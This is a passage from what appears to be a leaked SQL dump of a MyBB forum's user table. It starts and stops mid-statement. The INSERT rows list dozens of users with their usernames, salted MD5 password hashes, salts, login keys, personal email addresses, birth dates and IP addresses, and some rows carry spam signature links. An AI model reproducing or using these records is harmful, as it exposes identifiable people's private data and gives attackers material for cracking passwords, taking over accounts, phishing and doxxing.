'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '124.187.6.178', '101.163.15.100', '2092631730', '1705185124', '', '854', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('260', 'micheal010', '8d23014b90718e22a1ca8ab592a44a88', 'ul3idisP', 'soFlQXiuWxlP5BuNMECuU6cVQgZgxfV9Z5GuUJzJGL8E1lwXV8', 'rowlandandc1@gmail.com', '1', '', '', '', '2', '', '0', '', '1350219142', '1350938297', '1350336610', '1350938250', '', '0', '', '', '', '1-1-1986', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '41.190.2.8', '196.46.245.50', '700318216', '-1003555534', 'english', '6890', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('261', 'alexela84', '5af540f8225075ebe132b41a79cc7420', 'aijhKCPb', 'aa98vwF3DEpHvYMNaoXeBMRUwBhpCtYitUctP19oQCFs7hkgRa', 'alexela84@gmail.com', '0', '', '', '', '2', '', '0', '', '1350224829', '1350225214', '1350224829', '0', '', '0', '', '', '', '9-12-1984', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '84.85.88.250', '84.85.88.250', '1414879482', '1414879482', '', '385', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('262', 'RAND0M1ZER', '1ad17b5e5de2d09cb0a73de3abd92fb6', 'wxk8RULR', 'WUsq9reM5VjakzMIyw4LunjS4l8Ceqyy739IqLmYorEMPkhdih', 'erik.b22@gmail.com', '20', '', '', '', '2', '', '0', '', '1350250195', '1352619851', '1352422992', '1352619849', '', '0', '', '', '', '22-11-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '108.162.138.186', '108.162.138.186', '1822591674', '1822591674', '', '3853', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('263', 'MerrillC1941', '831947362016f51ce94b8cbe22058fc6', 'wFctOCa4', 'oOqIQTlgDybspoonJHqo4HMOLFUqgl5uAMV44zg7MdkUmNMcOr', 'Kishacla6372@yahoo.com', '0', '', '', '', '2', '', '0', '', '1350353250', '1350354643', '1350353250', '0', 'http://ostatic.org/member/whileminahenson2004', '0', '', '', '', '25-6-1973', 'all', '[url=http://ostatic.org/member/richardjoyner1942]advance payday loan[/url] [url=http://www.extratasty.com/profile/59605/cameranleon1969]cash advance with no bank account[/url]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '129.121.100.27', '129.121.101.56', '-2122750949', '-2122750664', '', '12', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('266', 'King Of Dunces', 'ad736145097607f6993200b17007be66', 'XHTHvcyL', 'Z2j2kQVWGQUUCahZYBNHn6egXsJ2uJsVmENZKiKk1CYHoIMkC1', 'bleach505_ich@hotmail.com', '0', '', '', '', '7', '', '0', '', '1350422573', '1350478892', '1350478892', '0', '', '0', '', '', '', '10-7-1987', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '67.221.255.12', '63.153.255.202', '1138622220', '1067057098', '', '2620', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('264', 'D?ea', '65965b266a52ba13f0b1fab60263754b', 'H8Lnmzck', 'kP4UukhHGPbbgXe8IAnVjjPqPS2jcMw4zWzROvLI6a2IJp1y9k', 'blackwhitecoder@live.dk', '56', 'http://wizardforums.com/uploads/avatars/avatar_1389.png?dateline=1350472999', '100|100', 'remote', '2', '', '0', '', '1350398790', '1351696461', '1351456039', '1351696461', '', '0', '', '', '', '26-3-1990', 'all', '[align=center][img]http://i.imgur.com/GgMTS.jpg[/img][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '2', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '178.157.194.171', '178.157.194.171', '-1298283861', '-1298283861', '', '23318', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:2:{s:4:\"acid\";a:3:{i:20;a:5:{s:4:\"acid\";i:20;s:4:\"name\";s:7:\"Thinker\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_27_19.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}}s:0:\"\";a:1:{s:0:\"\";a:1:{s:11:\"showpostbit\";i:1;}}}', '7', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('265', 'Ryan', 'b4f5569280f4e05c4928205d03df50e8', 'iVLD9nmO', 'XO61Mt9BioqQEJUloIcE2yUynkeJEfqs9znmYxmZGdEqLxxegt', 'ryanseymour09@hotmail.com', '1', '', '', '', '2', '', '0', '', '1350412416', '1351792594', '1350412736', '1351792445', '', '0', '', '', '', '9-4-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '78.143.155.3', '78.143.155.3', '1318034179', '1318034179', '', '618', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('267', 'Y0shi', '3e50f25035ddd0ab494e7a972bd10fb2', 'wCKOPQVq', 'GQf7O6vGriMw1Aaktcw5lAD4AEszufB4l1ujvVchPBaiwOeNOW', 'fb_tis@hotmail.com', '0', '', '', '', '2', '', '0', '', '1350455939', '1350456684', '1350455939', '0', '', '0', '', '', '', '20-9-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '110.143.162.220', '110.143.162.220', '1854907100', '1854907100', '', '745', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('268', 'pushed', 'e885c9cce30e7c27772c974c8a23fed3', 'SXYW6dc2', 'IDGKktfaAOiapzzQ7eDap4jxBUSqTRXpnflU9rAC6sYQcQWS6z', 'pushed@ymail.com', '0', '', '', '', '2', '', '0', '', '1350487586', '1351515920', '1351512603', '0', '', '0', '', '', '', '5-9-1977', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '206.82.167.137', '206.82.167.137', '-833443959', '-833443959', '', '1857', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('270', 'LCS', '06d6ead18fefaa0e1b048a7242666245', 'Uc8XXqNj', 'uQi4QaVhOyYFUHYl1WLRw3Ri8G6AvCjsGbBRqqYaH69ZA9usDv', 'marketing@efyu.net', '10', './uploads/avatars/avatar_270.gif?dateline=1350500229', '120|120', 'upload', '2', '', '0', '', '1350499356', '1350912932', '1350844387', '1350651248', '', '0', '', '', '', '17-12-1994', 'all', '[align=center][url=http://www.efyu.net/?join=2][img]http://www.efyu.net/signature/signature.gif[/img][/url][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '228', '0', '3', '2.124.223.31', '2.124.223.31', '41738015', '41738015', '', '9947', '1', '3', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('272', 'YuckFou', '74fc7aed51248c1be37fed47fff40347', 'ATp2K1jl', 'Hlo8vssZWFgGZP22nTtg5kecTHiwvGP9Rf6YP7Wf3VIw1ERNsR', 'troll@monemail.fr.nf', '3', '', '', '', '2', '', '0', '', '1350496931', '1350664095', '1350528000', '1350527053', '', '0', '', '', '', '1-1-1991', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '108.171.103.148', '171.25.193.21', '1823172500', '-1424375531', '', '1749', '1', '3', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '3', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('274', 'saevio99', 'eca6eb16423d5493fab19837a5b36630', '8N3UHEbB', 'ZKADL5Em2Q4n6NV83SjgydinjxuRLvDLys3jSDdsGgPIXdoHgQ', 'saevio99@gmail.com', '0', '', '', '', '2', '', '0', '', '1350533122', '1350800178', '1350800178', '0', '', '0', '', '', '', '12-9-1991', 'all', '', '1', '1', '2', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '1.38.16.226', '1.38.17.131', '19271906', '19272067', 'english', '392', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('276', 'ddeus', '66f43c75505ebf954ea6df3afe63b040', 'uC9pWGfn', 'A8AKwFjRmz5wPjNvXN8fZya8ZSsOj87zcH9DVuyny8P7xvTaEH', 'dunk.cooper@gmail.com', '0', '', '', '', '2', '', '0', '', '1350576634', '1350577249', '1350576634', '0', '', '0', '', '', '', '1-1-1980', 'all', '', '1', '1', '0', '1', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '66.162.121.76', '66.162.121.76', '1117944140', '1117944140', '', '617', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('277', 'STaRDoGG', 'd70535a8dbfe8fee13e96cf7c446c9b1', 'eoYKn3Eh', 'MWFe6bKpv1qoUdjZpN18rGOEfoE4RCQRFF4vWEqRPIqJmuTqzI', 'geekdroponline@gmail.com', '0', '', '', '', '2', '', '0', '', '1350590616', '1350603201', '1350601076', '0', 'http://geekdrop.com', '0', '', '', '', '22-1-1971', 'none', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '0', '2', '', '', '0', '1', '1350603168', '', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '67.175.153.67', '67.175.153.67', '1135581507', '1135581507', 'english', '2486', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, 